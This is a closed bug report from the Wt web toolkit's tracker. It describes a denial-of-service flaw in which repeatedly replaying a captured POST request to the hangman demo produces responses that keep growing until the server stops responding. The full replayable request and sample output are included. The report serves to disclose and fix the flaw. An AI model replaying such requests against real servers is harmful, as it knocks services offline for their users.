Bug #5094: DoS Vulnerability - Wt - Redmine

Actions

Copy link

Bug #5094

closed

DoS Vulnerability

Added by Erhan Aydın almost 8 years ago. Updated almost 8 years ago.

Status:

Closed

Priority:

High

Assignee:

Koen Deforche

Target version:

3.3.6

Start date:

07/13/2016

Due date:

% Done:

Estimated time:

Description

Using the hangman example provided on the webtoolkit.eu, I could reproduce a DoS vulnerability we encountered on our own servers running wthttpd.

If you capture and resend certain kinds of POST requests to a witty based application, it sends you back a continuously "piling-up" response. This, after a while slows down the server and eventually the server stops responding.

What I did was to press the "New Game" button on the hangman example. This is the request I captured and replayed many times:

@POST /wt/examples/hangman-game/hangman.wt/play?wtd=CpMe3daRC7GwwImq HTTP/1.1

Host: www.webtoolkit.eu

Connection: keep-alive

Content-Length: 300

Origin: https://www.webtoolkit.eu

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36

Content-type: application/x-www-form-urlencoded

Accept: /

Referer: https://www.webtoolkit.eu/wt/examples/hangman-game/hangman.wt/play

Accept-Encoding: gzip, deflate, br

Accept-Language: en-GB,en-US;q=0.8,en;q=0.6,es;q=0.4

Cookie: _gat=1; _ga=GA1.2.854670646.1466166359

request:jsupdate

signal:saf37

o7rgr7t:1

focus:o7rgr7w

_:/play

tid:o7rgr7w

type:click

clientX:928

clientY:407

documentX:928

documentY:423

dragdX:928

dragdY:423

wheel:--1

screenX:928

screenY:468

scrollX:0

scrollY:0

width:75

height:17

widgetX:16

widgetY:17

button:1

charCode:0

ackId:632444023

pageId:1

:@

These are the requests received, growing each time:

@--------------- RESPONSE 1 ---------------------

Wt.p.response(632444024);{var j39675=Wt3_3_6.$('o7rgr5h');

Wt3_3_6.setHtml(j39675,'\n

Guess the word, guest!

--------------- RESPONSE 2 ---------------------

Wt.p.response(632444024);{var j39675=Wt3_3_6.$('o7rgr5h');

Wt3_3_6.setHtml(j39675,'\n

Guess the word, guest!

--------------- RESPONSE 3 ---------------------

Wt.p.response(632444024);{var j39675=Wt3_3_6.$('o7rgr5h');

Wt3_3_6.setHtml(j39675,'\n

Guess the word, guest!

\n ',false);

var j39676=Wt3_3_6.$('o7rgr5i');

Wt3_3_6.setHtml(j39676,'~~/span>/span>/span>/span>/span>/span>/span>~~');

Wt3_3_6.hide('o7rgr7t');

Wt3_3_6.hide('o7rgr7w');

Wt3_3_6.show('o7rgr5l');

Wt3_3_6.hide('o7rgr5u');

Wt3_3_6.show('o7rgr5x');

Wt.p.setFormObjects([]);}{Wt3_3_6.remove('o7rgr8a');Wt3_3_6.remove('o7rgr89');Wt3_3_6.remove('o7rgr88');Wt3_3_6.remove('o7rgr87');Wt3_3_6.remove('o7rgr86');Wt3_3_6.remove('o7rgr85');Wt3_3_6.remove('o7rgr84');Wt3_3_6.remove('o7rgr83');Wt3_3_6.remove('o7rgr82');Wt3_3_6.remove('o7rgr81');Wt3_3_6.remove('o7rgr80');Wt3_3_6.remove('o7rgr7z');Wt3_3_6.remove('o7rgr7y');Wt3_3_6.remove('o7rgr7x');var j39677=Wt3_3_6.$('o7rgr5i');

Wt3_3_6.setHtml(j39677,'~~/span>/span>/span>/span>/span>/span>/span>~~-');

Wt3_3_6.show('o7rgr5l');

}{Wt3_3_6.remove('o7rgr8p');Wt3_3_6.remove('o7rgr8o');Wt3_3_6.remove('o7rgr8n');Wt3_3_6.remove('o7rgr8m');Wt3_3_6.remove('o7rgr8l');Wt3_3_6.remove('o7rgr8k');Wt3_3_6.remove('o7rgr8j');Wt3_3_6.remove('o7rgr8i');Wt3_3_6.remove('o7rgr8h');Wt3_3_6.remove('o7rgr8g');Wt3_3_6.remove('o7rgr8f');Wt3_3_6.remove('o7rgr8e');Wt3_3_6.remove('o7rgr8d');Wt3_3_6.remove('o7rgr8c');Wt3_3_6.remove('o7rgr8b');var j39678=Wt3_3_6.$('o7rgr5i');

Wt3_3_6.setHtml(j39678,'~~/span>/span>/span>/span>/span>/span>~~-');

Wt3_3_6.show('o7rgr5l');

}